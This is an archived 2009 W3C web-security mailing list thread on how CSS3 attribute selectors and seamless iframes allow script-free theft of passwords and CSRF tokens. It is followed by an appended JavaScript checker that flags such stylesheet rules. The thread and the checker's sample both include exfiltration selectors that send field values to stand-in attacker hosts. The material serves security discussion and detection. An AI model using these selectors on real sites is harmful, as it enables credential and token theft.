- From: Collin Jackson <w3c@collinjackson.com>
- Date: Sat, 5 Dec 2009 10:05:25 -0800
- To: Adam Barth <w3c@adambarth.com>
- Cc: sird@rckc.at, public-web-security@w3.org
A few thoughts:

* The password stealing attack can already be accomplished using the iframe to create a login page and prompting the user to type their password. It's not necessary to use CSS3 or seamless.

* If the password manager is used, CSS3 + seamless lets you steal the password without user interaction.

* However, if you can inject arbitrary CSS3 and a seamless iframe into a page, there's a good chance you can inject a password field, so this password manager attack doesn't require seamless, just CSS3.

* Many webapps include a CSRF token in every page as a hidden form field. If the page that allows CSS3 injection includes such a token, you don't need seamless iframes to steal the token.

It seems like CSS3 is adding a lot of attack surface; sites may need to block arbitrary CSS3 injection regardless of seamless. That is unfortunate since browser vendors have been removing expression, -moz-binding, and other features that make CSS injection dangerous.

On Sat, Dec 5, 2009 at 8:54 AM, Adam Barth <w3c@adambarth.com> wrote:
> I see. The issue is that the attacker can inject CSS + iframes, but
> not script, into one page in an origin. Now with seamless+CSS3, the
> attacker can steal information from the entire origin. Very cool!
>
> Adam
>
>
> On Fri, Dec 4, 2009 at 6:39 AM, Eduardo Vela <sirdarckcat@gmail.com> wrote:
>> I sincerely understand why people want seamless iframes on HTML5.. I mean,
>> I've been there.. but sometimes the better way to do something is not to do
>> it.
>>
>> The perfect example is seamless iframes (defined in HTML5) and CSS3
>> selectors.
>>
>> I have (together with David Lindsay and Gareth Heyes) expressed
>> several times that we think this is a bad idea.
>>
>> We always receive the same answer "seamless iframes are same-origin!" and
>> believe me, I know.. but guess what? JavaScript is also same origin.. and it
>> also creates problems.
>>
>> What I see with those awesome CSS3 selectors such as:
>>
>> input[type=password][value^=a]{background:url("//attacker/password_starts_with=a")}
>>
>> is that they create a new type of XSS attack, and those are purely CSS based XSS
>> attacks.. without JS.. that will allow an attacker to read arbitrary files
>> from the page WITHOUT the need of JS.
>>
>> I really hope people in here know that a cool feature is sometimes not such
>> a good idea, and hopefully, we can see how to resolve this issue..
>>
>> References:
>> The Sexy Assassin - BlueHat 2008 Presentation http://p42.us/css/
>> Favorite XSS - BlackHat 2009 Presentation http://p42.us/favxss/
>> Stefano Di Paola PoC http://www.wisec.it/CssSteal/frame.html
>>
>> Greetings!!
>> -- Eduardo
>> http://www.sirdarckcat.net/
Received on Saturday, 5 December 2009 18:06:25 UTC
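As an added example (not from the thread or any of its participants), here is a small JavaScript check that a site accepting user-supplied CSS could run to flag the exfiltration pattern discussed above: an attribute selector that probes a field's value (`^=`, `$=`, `*=`) combined with a `url()` that leaves the page. The regexes, function names and the sample stylesheet are assumptions constructed for this example; the first sample rule is the selector quoted in the thread.

```javascript
// Added example, not code from the thread. Flags CSS rules that pair an
// attribute-value probe on a form field with an external url(), which is how
// a password or hidden CSRF token leaks one fragment per rule via CSS alone.
// Assumes a flat "selector { declarations }" CSS subset with no nesting.

// [attr^=...], [attr$=...], [attr*=...]: prefix, suffix and substring tests.
const VALUE_PROBE = /\[\s*([\w-]+)\s*([\^$*])=\s*["']?([^"'\]]*)["']?\s*\]/g;
// url(...) whose target is absolute or protocol-relative, i.e. a request
// that can carry the matched fragment to another host.
const EXTERNAL_URL = /url\(\s*["']?\s*((?:[a-z][a-z0-9+.-]*:)?\/\/[^"')\s]+)/gi;

function splitRules(css) {
  const rules = [];
  const re = /([^{}]+)\{([^{}]*)\}/g;
  let m;
  while ((m = re.exec(css)) !== null) {
    rules.push({ selector: m[1].trim(), body: m[2].trim() });
  }
  return rules;
}

// Returns one finding per rule that both probes an attribute value and
// loads an external resource; an empty array means nothing was flagged.
function findCssExfiltrationRules(css) {
  const findings = [];
  for (const { selector, body } of splitRules(css)) {
    const probes = [...selector.matchAll(VALUE_PROBE)].map(p => ({
      attr: p[1], op: p[2], fragment: p[3],
    }));
    const urls = [...body.matchAll(EXTERNAL_URL)].map(u => u[1]);
    if (probes.length && urls.length) {
      findings.push({ selector, probes, urls });
    }
  }
  return findings;
}

// Constructed sample: the thread's selector, a hidden-token probe using a
// hypothetical attacker.example host, and a benign rule with a local url().
const SAMPLE_CSS = `
input[type=password][value^=a]{background:url("//attacker/password_starts_with=a")}
input[name="csrf_token"][value*="7f"] { background-image: url(https://attacker.example/t?7f); }
input[type=password] { border: 1px solid red; background: url(/img/lock.png); }
`;
```

A filter like this only catches the pattern the thread names; as the message above argues, the safer policy is to refuse arbitrary untrusted CSS entirely.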